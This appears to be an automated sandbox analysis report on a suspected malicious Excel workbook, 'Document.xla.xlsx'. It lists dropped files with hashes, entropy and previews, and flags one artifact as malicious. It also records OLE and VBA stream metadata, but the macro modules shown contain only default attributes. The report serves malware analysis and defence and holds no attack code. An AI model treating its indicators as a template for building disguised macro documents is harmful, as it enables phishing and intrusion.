          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 16:11:25.670.EXCEL (0x1E08).0x1EB4.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-16T16:11:25.670Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:11:25.0297437Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:11:25.0297437Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:11:25.0297437Z\", \"C\" : \"\", \"Q\" : 9.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with very long lines (28477), with CRLF line terminators
          Category:dropped
          Size (bytes):205142
          Entropy (8bit):4.873894321988825
          Encrypted:false
          SSDEEP:1536:egEQfCKOlmYdOUs3ZMaqn4X8jwDTlFZ2cLXXXhUR9mz1BsxRqgEmP:uQwdO9Zhq2UiU
          MD5:6E418EC649371ED044A1E33ADE11FF9B
          SHA1:A2030620AAADB0A99FF83F951C452B10A760521F
          SHA-256:AC8F21976D3BC6E66A24435851681B3263C1A9441F488CA397B4C17AE5D9E20C
          SHA-512:06BF5DF18CEEA8E9DD3180FB540FAE8886C8F9449233FC8103432C8D08B4D22BEE260592841056F32029ADDCE1A7C282402CC626454B024DDB99DD45DA946784
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 16:12:55.590.EXCEL (0x78C).0x938.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-16T16:12:55.590Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:12:55.1999246Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:12:55.1999246Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T16:12:55.1999246Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N\
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):7.470406853545188
          Encrypted:false
          SSDEEP:768:nN/DwTOipXXGvdfBwEhkY2JMpK7ilqjqO:nBcp4tSEq/JMpHl3
          MD5:3BAF0DD0038679F4E6C98034E93DF530
          SHA1:86A509EC93ED802B13F4CB6D445C89AB9C7523B5
          SHA-256:FBA628E96DA946EA2ECF87CCAB24E7861874F7E0AC3624A080FC3C366252AC60
          SHA-512:0879E7A12D61BC5169AF32A209E0C03C7A981E761B7878E92B3DE7A692C1566EE1E028CA3533E5ED0134CE79E94CA014F55E946EEB0BB7174359E93C1000BA97
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):53760
          Entropy (8bit):7.3857009341983
          Encrypted:false
          SSDEEP:768:bWGZVIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvMYVZAf:bWPHbXpsJ2crDtkFZ8nukB
          MD5:F03A15D4B21D6E323D62461196ED93A8
          SHA1:351A0AD6C6705EAFA1B57F9B9D05F5F20C79F1F9
          SHA-256:25F97C137A2F8680599A65CFA82BF5F9D9C5464006F0FB83F1997CE3D7CA01AE
          SHA-512:42B6927CA2F248DEFECE4DABEF0DB5AAE253A4CC9FCB16A497A46B51E6A5C7791E0AEA6424280854A98D069257B1D4EB054BB832AABC81571D93AAEFC6C1F522
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):208896
          Entropy (8bit):6.5631372993401556
          Encrypted:false
          SSDEEP:6144:U7AQk3hbdlylKsgwyzcTbWhZFVE+WaxHApWhcm7PIDqZ8:eAEW+6PJ
          MD5:02D79E0D9C67AA01BF8A914F32B5564A
          SHA1:57C722A04DFFDBEF41D88B85AD6D960BFC557CE1
          SHA-256:0D2FAF5837B0213AD96C62546EF9F07BD6DD2AF4B02056AED87694CB70C6DAAA
          SHA-512:FDEAFDFFC1490796722BC7B21DB29A28D3BE33FCC904FF8BE31254B4B3652B11E00D4CC39D726AD80C2FEC9495ED65602F2664F761B9149DC41E30E6053357DB
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:12:53 2024, Security: 1
          Category:dropped
          Size (bytes):836608
          Entropy (8bit):7.631513040417777
          Encrypted:false
          SSDEEP:12288:kArW+EJEUiOIBUzMTSLD3DERnLRmF8DhEPDxpsAQx1Zj+jhEP3PJgWJM:krBaCbARM8Az8Z+js3PJF
          MD5:6B7F3878C014743D35DDB2C4107CD72C
          SHA1:72EBB11D31ACBD0D3C08F9670404694788797C38
          SHA-256:D75B56C364AFE7C0A6DADF6698D382ABECC5DA7DC225C46E64765E82AC649A78
          SHA-512:BF8E992FF544B59723765FD6C9A57AF7ECF206E51B7971DF5CA6C130C1F913AE5EC15C914697F6FA9593C7D149DA7EA15A1AB8CF55C89304314123D92E7A0CAC
          Malicious:false
          Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:false
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:12:53 2024, Security: 1
          Category:dropped
          Size (bytes):836608
          Entropy (8bit):7.631513040417777
          Encrypted:false
          SSDEEP:12288:kArW+EJEUiOIBUzMTSLD3DERnLRmF8DhEPDxpsAQx1Zj+jhEP3PJgWJM:krBaCbARM8Az8Z+js3PJF
          MD5:6B7F3878C014743D35DDB2C4107CD72C
          SHA1:72EBB11D31ACBD0D3C08F9670404694788797C38
          SHA-256:D75B56C364AFE7C0A6DADF6698D382ABECC5DA7DC225C46E64765E82AC649A78
          SHA-512:BF8E992FF544B59723765FD6C9A57AF7ECF206E51B7971DF5CA6C130C1F913AE5EC15C914697F6FA9593C7D149DA7EA15A1AB8CF55C89304314123D92E7A0CAC
          Malicious:false
          Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):165
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:E4FFN/EDPWlFlfv:1FWilffv
          MD5:47A294922BE037C38D73C866A3F7F5E0
          SHA1:E165F663BF052660CF1858D065388CC128E631D2
          SHA-256:34033A21A8D54B0627C089E5C6A6C3AD6CE045DF86ACDED6A31D9613B879C265
          SHA-512:F46ABEEF0E3ED4B80B2C996E44E6E103FE22D12F5BF461708AE401C1C5F8CAC3718068C2D7FF0A1995A0866E473AB1DF6A20A4BD12211B9BAA99EB4535CFE83A
          Malicious:true
          Preview:.user ..G.a.n.j.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
          Entropy (8bit):7.749627073428886
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Document.xla.xlsx
          File size:1'106'944 bytes
          MD5:d4c6ac821c22be30144711786c736a1a
          SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
          SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
          SHA512:592e25f4e3b9640eec6ad747a421f5498e4f25c74ee3bc47d06a79e4d5c30b0ca487b0518ede189ee491d10d4678a3d0dc1144912e37f798a82d594e967b68bd
          SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
          TLSH:7E3501D5B28DAB62C606563575F3939E1710AC03D902427B37F8732D2AF76D08607FAA
          File Content Preview:........................>...................................M...................O...P...Q...R...................=...>...X.......m.......o......................................................................................................................
          Icon Hash:35e58a8c0c8a85b9
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Author:
          Last Saved By:
          Create Time:2006-09-16 00:00:00
          Last Saved Time:2024-12-16 08:27:21
          Creating Application:Microsoft Excel
          Security:1
          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:786432
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 10 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc c2 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
          VBA File Name:Sheet3.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 42 cd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet3"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 2d b4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.889430592781307
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:200
          Entropy:3.292068105701867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . : ^ S O . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
          General
          Stream Path:MBD010681DB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DB/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:37036
          Entropy:7.720975169587741
          Base64 Encoded:True
